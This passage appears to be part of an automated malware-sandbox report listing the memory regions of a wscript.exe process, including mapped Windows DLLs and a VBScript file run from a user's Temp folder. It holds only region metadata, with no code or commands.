name = "private_0x0000000000830000"
filename = ""
Region:
id = 1681
start_va = 0x74f90000
end_va = 0x74f98fff
entry_point = 0x74f90000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1682
start_va = 0x75970000
end_va = 0x7597bfff
entry_point = 0x75970000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1683
start_va = 0x75980000
end_va = 0x759dffff
entry_point = 0x75980000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1684
start_va = 0x759e0000
end_va = 0x759f8fff
entry_point = 0x759e0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1685
start_va = 0x75a10000
end_va = 0x75abbfff
entry_point = 0x75a10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1686
start_va = 0x75cf0000
end_va = 0x75e4bfff
entry_point = 0x75cf0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1687
start_va = 0x75f40000
end_va = 0x75f85fff
entry_point = 0x75f40000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1688
start_va = 0x75fa0000
end_va = 0x7603cfff
entry_point = 0x75fa0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1689
start_va = 0x760d0000
end_va = 0x761bffff
entry_point = 0x760d0000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1690
start_va = 0x76220000
end_va = 0x7632ffff
entry_point = 0x76220000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1691
start_va = 0x76490000
end_va = 0x7652ffff
entry_point = 0x76490000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1692
start_va = 0x76720000
end_va = 0x767aefff
entry_point = 0x76720000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1693
start_va = 0x76a70000
end_va = 0x76afffff
entry_point = 0x76a70000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1694
start_va = 0x77810000
end_va = 0x77819fff
entry_point = 0x77810000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1695
start_va = 0x77820000
end_va = 0x7791ffff
entry_point = 0x77820000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1696
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x0
region_type = private
name = "private_0x0000000077a20000"
filename = ""
Region:
id = 1697
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x0
region_type = private
name = "private_0x0000000077b20000"
filename = ""
Region:
id = 1698
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1699
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1700
start_va = 0x660000
end_va = 0x7e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000660000"
filename = ""
Region:
id = 1701
start_va = 0x75c00000
end_va = 0x75c5ffff
entry_point = 0x75c00000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1702
start_va = 0x75e50000
end_va = 0x75f1bfff
entry_point = 0x75e50000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1703
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1704
start_va = 0x30000
end_va = 0x31fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1705
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1706
start_va = 0xb0000
end_va = 0xb0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 1707
start_va = 0x840000
end_va = 0x9c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000840000"
filename = ""
Region:
id = 1708
start_va = 0x9d0000
end_va = 0x1dcffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009d0000"
filename = ""
Region:
id = 1709
start_va = 0x1dd0000
end_va = 0x2112fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001dd0000"
filename = ""
Region:
id = 1710
start_va = 0x75210000
end_va = 0x7528ffff
entry_point = 0x75210000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1711
start_va = 0x2120000
end_va = 0x225ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002120000"
filename = ""
Region:
id = 1712
start_va = 0x350000
end_va = 0x42efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000350000"
filename = ""
Region:
id = 1713
start_va = 0x2140000
end_va = 0x217ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002140000"
filename = ""
Region:
id = 1714
start_va = 0x2220000
end_va = 0x225ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002220000"
filename = ""
Region:
id = 1715
start_va = 0x23b0000
end_va = 0x24affff
entry_point = 0x0
region_type = private
name = "private_0x00000000023b0000"
filename = ""
Region:
id = 1716
start_va = 0x7efd8000
end_va = 0x7efdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1717
start_va = 0x24b0000
end_va = 0x277efff
entry_point = 0x24b0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1718
start_va = 0xc0000
end_va = 0xcefff
entry_point = 0xc0000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")
Region:
id = 1719
start_va = 0x75040000
end_va = 0x7509efff
entry_point = 0x75040000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll")
Region:
id = 1720
start_va = 0x5d0000
end_va = 0x60ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005d0000"
filename = ""
Region:
id = 1721
start_va = 0x2900000
end_va = 0x29fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 1722
start_va = 0x7efd5000
end_va = 0x7efd7fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1723
start_va = 0x751f0000
end_va = 0x75202fff
entry_point = 0x751f0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1724
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1725
start_va = 0x76040000
end_va = 0x760c2fff
entry_point = 0x76040000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")
Region:
id = 1726
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1727
start_va = 0x74fd0000
end_va = 0x7503afff
entry_point = 0x74fd0000
region_type = mapped_file
name = "vbscript.dll"
filename = "\\Windows\\SysWOW64\\vbscript.dll" (normalized: "c:\\windows\\syswow64\\vbscript.dll")
Region:
id = 1728
start_va = 0x260000
end_va = 0x260fff
entry_point = 0x260000
region_type = mapped_file
name = "zmxzaa.vbs"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs")
Region:
id = 1729
start_va = 0x75cc0000
end_va = 0x75cecfff
entry_point = 0x75cc0000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 1730
start_va = 0x76330000
end_va = 0x7644cfff
entry_point = 0x76330000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 1731
start_va = 0x77800000
end_va = 0x7780bfff
entry_point = 0x77800000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 1732
start_va = 0x750e0000
end_va = 0x750f5fff
entry_point = 0x750e0000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1733
start_va = 0x260000
end_va = 0x29bfff
entry_point = 0x260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1734
start_va = 0x260000
end_va = 0x29bfff
entry_point = 0x260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1735
start_va = 0x260000
end_va = 0x29bfff
entry_point = 0x260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1736
start_va = 0x260000
end_va = 0x29bfff
entry_point = 0x260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1737
start_va = 0x260000
end_va = 0x29bfff
entry_point = 0x260000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1738
start_va = 0x750a0000
end_va = 0x750dafff
entry_point = 0x750a0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1739
start_va = 0x260000
end_va = 0x260fff
entry_point = 0x260000
region_type = mapped_file
name = "zmxzaa.vbs"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs")
Region:
id = 1740
start_va = 0x570000
end_va = 0x5affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 1741
start_va = 0x2800000
end_va = 0x28fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 1742
start_va = 0x7efad000
end_va = 0x7efaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1743
start_va = 0x74fc0000
end_va = 0x74fc7fff
entry_point = 0x74fc0000
region_type = mapped_file
name = "msisip.dll"
filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll")
Region:
id = 1744
start_va = 0x2a00000
end_va = 0x2dfffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a00000"
filename = ""
Region:
id = 1745
start_va = 0x270000
end_va = 0x270fff
entry_point = 0x270000
region_type = mapped_file
name = "zmxzaa.vbs"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs")
Region:
id = 1746
start_va = 0x2300000
end_va = 0x233ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1747
start_va = 0x2f40000
end_va = 0x303ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f40000"
filename = ""
Region:
id = 1748
start_va = 0x74fa0000
end_va = 0x74fb5fff
entry_point = 0x74fa0000
region_type = mapped_file
name = "wshext.dll"
filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll")
Region:
id = 1749
start_va = 0x7efaa000
end_va = 0x7efacfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1750
start_va = 0x75100000
end_va = 0x75183fff
entry_point = 0x75100000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1751
start_va = 0x76b00000
end_va = 0x77749fff
entry_point = 0x76b00000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1752
start_va = 0x75c60000
end_va = 0x75cb6fff
entry_point = 0x75c60000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1753
start_va = 0x270000
end_va = 0x29ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 1754
start_va = 0x74b80000
end_va = 0x74bacfff
entry_point = 0x74b80000
region_type = mapped_file
name = "scrobj.dll"
filename = "\\Windows\\SysWOW64\\scrobj.dll" (normalized: "c:\\windows\\syswow64\\scrobj.dll")
Region:
id = 1755
start_va = 0x260000
end_va = 0x26ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1756
start_va = 0x2e00000
end_va = 0x2efffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 1757
start_va = 0x74b50000
end_va = 0x74b70fff
entry_point = 0x74b50000
region_type = mapped_file
name = "wshom.ocx"
filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx")
Region:
id = 1758
start_va = 0x74b30000
end_va = 0x74b41fff
entry_point = 0x74b30000
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll")
Region:
id = 1759
start_va = 0x74b00000
end_va = 0x74b29fff
entry_point = 0x74b00000
region_type = mapped_file
name = "scrrun.dll"
filename = "\\Windows\\SysWOW64\\scrrun.dll" (normalized: "c:\\windows\\syswow64\\scrrun.dll")
Region:
id = 1760
start_va = 0x74490000
end_va = 0x745c2fff
entry_point = 0x74490000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")
Region:
id = 1761
start_va = 0x3040000
end_va = 0x316ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003040000"
filename = ""
Region:
id = 1762
start_va = 0x2180000
end_va = 0x21cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002180000"
filename = ""
Region:
id = 1763
start_va = 0x3170000
end_va = 0x335ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003170000"
filename = ""
Region:
id = 1764
start_va = 0x2260000
end_va = 0x22effff
entry_point = 0x0
region_type = private
name = "private_0x0000000002260000"
filename = ""
Region:
id = 1765
start_va = 0x2780000
end_va = 0x27fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 1766
start_va = 0x3170000
end_va = 0x328ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003170000"
filename = ""
Region:
id = 1767
start_va = 0x3320000
end_va = 0x335ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003320000"
filename = ""
Region:
id = 1768
start_va = 0x2340000
end_va = 0x23affff
entry_point = 0x0
region_type = private
name = "private_0x0000000002340000"
filename = ""
Region:
id = 1769
start_va = 0x3040000
end_va = 0x30fffff
entry_point = 0x3040000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 1770
start_va = 0x3130000
end_va = 0x316ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003130000"
filename = ""
Region:
id = 1771
start_va = 0x3360000
end_va = 0x375ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003360000"
filename = ""
Region:
id = 1772
start_va = 0x270000
end_va = 0x270fff
entry_point = 0x270000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll")
Region:
id = 1773
start_va = 0x290000
end_va = 0x29ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1774
start_va = 0x21d0000
end_va = 0x220ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000021d0000"
filename = ""
Region:
id = 1775
start_va = 0x37a0000
end_va = 0x389ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000037a0000"
filename = ""
Region:
id = 1776
start_va = 0x7efa7000
end_va = 0x7efa9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1777
start_va = 0x75350000
end_va = 0x7535dfff
entry_point = 0x75350000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll")
Region:
id = 1795
start_va = 0x2a0000
end_va = 0x2c7fff
entry_point = 0x2a0000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll")
Region:
id = 1796
start_va = 0x2260000
end_va = 0x229ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002260000"
filename = ""
Region:
id = 1797
start_va = 0x22b0000
end_va = 0x22effff
entry_point = 0x0
region_type = private
name = "private_0x00000000022b0000"
filename = ""
Region:
id = 1798
start_va = 0x38a0000
end_va = 0x399ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000038a0000"
filename = ""
Region:
id = 1799
start_va = 0x39e0000
end_va = 0x3a1ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000039e0000"
filename = ""
Region:
id = 1800
start_va = 0x3a40000
end_va = 0x3b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003a40000"
filename = ""
Region:
id = 1801
start_va = 0x7efa1000
end_va = 0x7efa3fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 1802
start_va = 0x7efa4000
end_va = 0x7efa6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1803
start_va = 0x75ac0000
end_va = 0x75bf5fff
entry_point = 0x75ac0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 1804
start_va = 0x77920000
end_va = 0x77a14fff
entry_point = 0x77920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 1805
start_va = 0x767e0000
end_va = 0x769dafff
entry_point = 0x767e0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 1806
start_va = 0x280000
end_va = 0x281fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 1807
start_va = 0x74960000
end_va = 0x74afdfff
entry_point = 0x74960000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 1808
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x530000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 1809
start_va = 0x540000
end_va = 0x541fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 1810
start_va = 0x530000
end_va = 0x530fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000530000"
filename = ""
Region:
id = 1811
start_va = 0x75950000
end_va = 0x7595afff
entry_point = 0x75950000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1812
start_va = 0x550000
end_va = 0x55bfff
entry_point = 0x550000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 1813
start_va = 0x560000
end_va = 0x567fff
entry_point = 0x560000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 1814
start_va = 0x5b0000
end_va = 0x5bffff
entry_point = 0x5b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 1815
start_va = 0x76450000
end_va = 0x76484fff
entry_point = 0x76450000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 1816
start_va = 0x77df0000
end_va = 0x77df5fff
entry_point = 0x77df0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 1817
start_va = 0x3b40000
end_va = 0x3cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b40000"
filename = ""
Region:
id = 1818
start_va = 0x74d00000
end_va = 0x74d43fff
entry_point = 0x74d00000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 1819
start_va = 0x3b40000
end_va = 0x3c4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b40000"
filename = ""
Region:
id = 1820
start_va = 0x3ca0000
end_va = 0x3cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ca0000"
filename = ""
Region:
id = 1821
start_va = 0x74ce0000
end_va = 0x74cfbfff
entry_point = 0x74ce0000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")
Region:
id = 1822
start_va = 0x74f80000
end_va = 0x74f86fff
entry_point = 0x74f80000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")
Region:
id = 1823
start_va = 0x610000
end_va = 0x62ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000610000"
filename = ""
Region:
id = 1830
start_va = 0x74c80000
end_va = 0x74cd1fff
entry_point = 0x74c80000
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")
Region:
id = 1831
start_va = 0x74c60000
end_va = 0x74c74fff
entry_point = 0x74c60000
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")
Region:
id = 1832
start_va = 0x74c50000
end_va = 0x74c5cfff
entry_point = 0x74c50000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")
Region:
id = 1833
start_va = 0x5c0000
end_va = 0x5c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1834
start_va = 0x5c0000
end_va = 0x5c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005c0000"
filename = ""
Region:
id = 1835
start_va = 0x74c40000
end_va = 0x74c45fff
entry_point = 0x74c40000
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll")
Region:
id = 1869
start_va = 0x3760000
end_va = 0x379ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003760000"
filename = ""
Region:
id = 1870
start_va = 0x39a0000
end_va = 0x39dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000039a0000"
filename = ""
Region:
id = 1871
start_va = 0x3da0000
end_va = 0x3e9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003da0000"
filename = ""
Region:
id = 1872
start_va = 0x3fc0000
end_va = 0x40bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003fc0000"
filename = ""
Region:
id = 1873
start_va = 0x74c00000
end_va = 0x74c3bfff
entry_point = 0x74c00000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1874
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 1875
start_va = 0x7ef9e000
end_va = 0x7efa0fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1876
start_va = 0x74bf0000
end_va = 0x74bf4fff
entry_point = 0x74bf0000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll")
Region:
id = 1877
start_va = 0x75a00000
end_va = 0x75a02fff
entry_point = 0x75a00000
region_type = mapped_file
name = "normaliz.dll"
filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll")
Region:
id = 1878
start_va = 0x7f0000
end_va = 0x7f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007f0000"
filename = ""
Region:
id = 1879
start_va = 0x74be0000
end_va = 0x74beffff
entry_point = 0x74be0000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")
Region:
id = 1880
start_va = 0x40c0000
end_va = 0x420ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000040c0000"
filename = ""
Region:
id = 1881
start_va = 0x4210000
end_va = 0x43fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004210000"
filename = ""
Region:
id = 1882
start_va = 0x40c0000
end_va = 0x41effff
entry_point = 0x0
region_type = private
